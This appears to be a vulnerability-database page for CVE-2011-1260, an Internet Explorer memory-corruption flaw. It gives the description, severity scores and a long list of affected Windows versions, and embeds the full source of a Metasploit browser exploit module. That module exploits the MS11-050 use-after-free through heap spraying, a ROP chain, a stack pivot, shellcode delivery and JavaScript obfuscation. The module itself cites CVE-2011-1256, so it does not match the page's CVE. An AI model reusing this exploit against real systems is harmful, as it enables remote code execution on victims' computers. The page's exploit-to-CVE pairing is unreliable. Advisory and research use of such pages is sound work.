CVE-2011-1260 Detail

CVE-2011-1260

CVE Descriptions

Microsoft Internet Explorer 8 and 9 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layout Memory Corruption Vulnerability."

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 17409

Publication date : 2011-06-16
22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms11_050_mshtml_cobjectelement.rb 12962 2011-06-17 01:56:20Z swtornio $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "7.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :vuln_test => nil, }) def initialize(info={}) super(update_info(info, 'Name' => "MS11-050 IE mshtml!CObjectElement Use After Free", 'Description' => %q{ This module exploits a use-after-free vulnerability in Internet Explorer. The vulnerability occurs when an invalid <object> tag exists and other elements overlap/cover where the object tag should be when rendered (due to their styles/positioning). The mshtml!CObjectElement is then freed from memory because it is invalid. However, the mshtml!CDisplay object for the page continues to keep a reference to the freed <object> and attempts to call a function on it, leading to the use-after-free. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 12962 $", 'Author' => [ 'd0c_s4vage', ], 'References' => [ ['CVE', '2011-1256'], ['OSVDB', '72948'], ['MSB', 'MS11-050'], ['URL', 'http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], # In IE6 the mshtml!CObjectElement size is 0xac [ 'Win XP SP3 Internet Explorer 7', # 7.0.5730.13 { # sizeof(mshtml!CObjectElement) 'FreedObjSize' => 0xb0, 'FakeObjCount' => 0x4000, 'FakeObjCountKeep' => 0x2000, 'ForLoopNumObjects' => 3, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>0, 'ROP' => false, } ], [ 'Win XP SP3 Internet Explorer 8 (no DEP)', # 8.0.6001.18702 { # sizeof(mshtml!CObjectElement) 'FreedObjSize' => 0xe0, # 0xdc rounded up 'FakeObjCount' => 0x8000, 'FakeObjCountKeep' => 0x3000, 'ForLoopNumObjects' => 5, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>0, 'ROP' => false, } ], [ 'Win XP SP3 Internet Explorer 8', { 'FreedObjSize' => 0xe0, # 0xdc rounded up 'FakeObjCount' => 0x8000, 'FakeObjCountKeep' => 0x3000, 'ForLoopNumObjects' => 5, 'FreedObjOverwritePointer'=>0x0c0c0c0c, 'FreedObjOffsetAlignSize'=>2, #'StackPivot'=>0x773E3F18, # xchg eax,esp / ret - comctl32.dll 'StackPivot' => 0x7E45F257, #xchg eax,esp - USER32.dll 'ROP' => true, } ], [ 'Debug Target (Crash)', {} ], ], 'DisclosureDate' => "Jun 16 2011", 'DefaultTarget' => 0)) end def auto_target(cli, request) agent = request.headers['User-Agent'] if agent =~ /MSIE 8\.0/ mytarget = targets[3] # IE 8 elsif agent =~ /MSIE 7\.0/ mytarget = targets[1] else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end # 3/22/2011 # fully patched x32 WinXP SP3, IE 8.0.6001.18702 def winxp_sp3_rva { #"kernel32!VirtualAlloc" => 0x7c809af1, "kernel32!VirtualAlloc" => 0x7c809ae1, "ntdll!memcpy" => 0x7c901db3, } end def compile_rop(rop_stack) rva = winxp_sp3_rva() num_random = 0 rop_stack.map do |rop_val| case rop_val when String if rop_val == "random" # useful for debugging # num_random += 1 # 0xaabbcc00 + num_random rand(0xffffffff) else raise RuntimeError, "Unable to locate key: #{rop_val.inspect}" unless rva[rop_val] rva[rop_val] end when Integer rop_val else raise RuntimeError, "unknown rop_val: #{rop_val.inspect}, #{rop_val.class}" end end.pack("V*") end def on_request_uri(cli, request) mytarget = target if target.name == 'Automatic' mytarget = auto_target(cli, request) unless mytarget send_not_found(cli) return end end @mytarget = mytarget @debug = true if mytarget == targets[4] return if ((p = regenerate_payload(cli)) == nil) id_name = rand_text_alpha(5) dir_name = rand_text_alpha(3) if @debug data = <<-DATA <html> <body> <script language='javascript'> document.body.innerHTML += "<object align='right' hspace='1000' width='1000'></object>"; document.body.innerHTML += "<a id='#{id_name}' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' ></a>"; document.body.innerHTML += "AAAAAAA"; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='#{dir_name}'></strong>"; </script> </body> </html> DATA print_status("Triggering #{self.name} vulnerability at #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") send_response(cli, data, { 'Content-Type' => 'text/html' }) return end raw_shellcode = payload.encoded shellcode = Rex::Text.to_unescape(raw_shellcode, Rex::Arch.endian(mytarget.arch)) spray = nil rop_shellcode_spray = nil obj_overwrite_ptr = [@mytarget['FreedObjOverwritePointer']].pack("V") if @mytarget['ROP'] rop_stack = [] 0x1f.times do |i| rop_stack << "random" end idx = -1 idx += 1 ; rop_stack[idx] = "kernel32!VirtualAlloc" # 1: idx += 1 ; rop_stack[idx] = "ntdll!memcpy" # 2:ret 10 to this after VirtualAlloc idx += 1 ; rop_stack[idx] = 0x7f000000 # 1:VirtualAlloc:lpAddress idx += 1 ; rop_stack[idx] = 0x4000 # 1:VirtualAlloc:dwSize idx += 1 ; rop_stack[idx] = (0x1000 | 0x2000) # 1:VirtualAlloc:flAllocationType MEM_COMMIT | MEM_RESERVE idx += 1 ; rop_stack[idx] = 0x40 # 1:VirtualAlloc:flProtect rwx idx += 1 ; rop_stack[idx] = 0x7f001000 # 3:into this after memcpy idx += 1 ; rop_stack[idx] = 0x7f001000 # 2:memcpy:dst idx += 1 ; rop_stack[idx] = 0x23000100 # 2:memcpy:src idx += 1 ; rop_stack[idx] = 0x2fff # 2:memcpy:size # align the rest of it back = rop_stack.slice!((rop_stack.length-1)-2, rop_stack.length) rop_stack = back + rop_stack rop_stack << @mytarget['StackPivot'] # align the stack for 0c0c0c0c front = rop_stack.slice!(0, 19) rop_stack = rop_stack + front # resolve strings in the rop_stack array (kernel32!VirtualAlloc, random, etc) rop = compile_rop(rop_stack) nops = make_nops(0x1000 - raw_shellcode.length) nops = Rex::Text.to_unescape(nops, Rex::Arch.endian(mytarget.arch)) #spray up to 0x23000000 rop_shellcode_spray = <<-JS var shellcode = unescape("#{shellcode}"); var nops = unescape("#{nops}"); while(nops.length < 0x1000) nops += nops; var shell_heapblock = nops.substring(0, 0x800-shellcode.length) + shellcode; while(shell_heapblock.length < 0x40000) shell_heapblock += shell_heapblock; var shell_finalspray = shell_heapblock.substring(0, (0x20000-6)/2); for(var shell_counter = 0; shell_counter < 0x1000; shell_counter++) { heap_obj.alloc(shell_finalspray); } JS spray = rop shellcode = "" else spray = obj_overwrite_ptr end spray = Rex::Text.to_unescape(spray, Rex::Arch.endian(mytarget.arch)) js = <<-JS heap_obj = new heapLib.ie(0x20000); var heapspray = unescape("#{spray}"); while(heapspray.length < 0x1000) heapspray += heapspray; var shellcode = unescape("#{shellcode}"); var heapblock = heapspray.substring(0, (0x800-shellcode.length)) + shellcode; var offset = #{[targets[1], targets[2]].include?(@mytarget) ? "0x400" : "0"}; var front = heapblock.substring(0, offset); var end = heapblock.substring(offset); heapblock = end + front; while(heapblock.length < 0x20000) heapblock += heapblock; finalspray = heapblock.substring(0, (0x10000-6)/2); for(var counter1 = 0; counter1 < 0x1000; counter1++) { heap_obj.alloc(finalspray); } #{rop_shellcode_spray} var obj_overwrite = unescape("#{Rex::Text.to_unescape(obj_overwrite_ptr, Rex::Arch.endian(mytarget.arch))}"); while(obj_overwrite.length < #{@mytarget['FreedObjSize']}) { obj_overwrite += obj_overwrite; } obj_overwrite = obj_overwrite.slice(0, (#{@mytarget['FreedObjSize']}-6)/2); for(var num_objs_counter = 0; num_objs_counter < #{@mytarget['ForLoopNumObjects']}; num_objs_counter++) { document.body.innerHTML += "<object align='right' hspace='1000' width='1000'>TAG_1</object>"; } for(var counter4 = 0; counter4 < #{@mytarget['FakeObjCountKeep']}; counter4++) { heap_obj.alloc(obj_overwrite, "keepme1"); } for(var counter5 = 0; counter5 < #{@mytarget['FakeObjCountKeep']}; counter5++) { heap_obj.alloc(obj_overwrite, "keepme2"); } document.body.innerHTML += "<a id='tag_3' style='bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px' >TAG_3</a>"; document.body.innerHTML += "AAAA"; document.body.innerHTML += "<strong style='font-size:1000pc;margin:auto -1000cm auto auto;' dir='ltr'>TAG_11</strong>"; JS js = heaplib(js) js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate html = <<-HTML <html> <body> <script language='javascript'> #{js} </script> </body> </html> HTML print_status("Sending exploit for #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 8

Microsoft>>Internet_explorer >> Version 8 (Open CPE detail)

Microsoft>>Windows_2003_server >> Version *

Microsoft>>Windows_2003_server >> Version - (Open CPE detail)

Microsoft>>Windows_7 >> Version *

Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version sp1 (Open CPE detail)
Microsoft>>Windows_7 >> Version sp1 (Open CPE detail)
Microsoft>>Windows_7 >> Version sp1 (Open CPE detail)

Microsoft>>Windows_7 >> Version -

Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2003 >> Version r2 (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)
Microsoft>>Windows_server_2008 >> Version r2 (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version - (Open CPE detail)

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)

Microsoft>>Windows_vista >> Version -

Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)
Microsoft>>Windows_vista >> Version - (Open CPE detail)

Microsoft>>Windows_xp >> Version *

Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version - (Open CPE detail)
Microsoft>>Windows_xp >> Version unknown (Open CPE detail)

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version - (Open CPE detail)

Configuraton 0

Microsoft>>Internet_explorer >> Version 9

Microsoft>>Internet_explorer >> Version 9 (Open CPE detail)
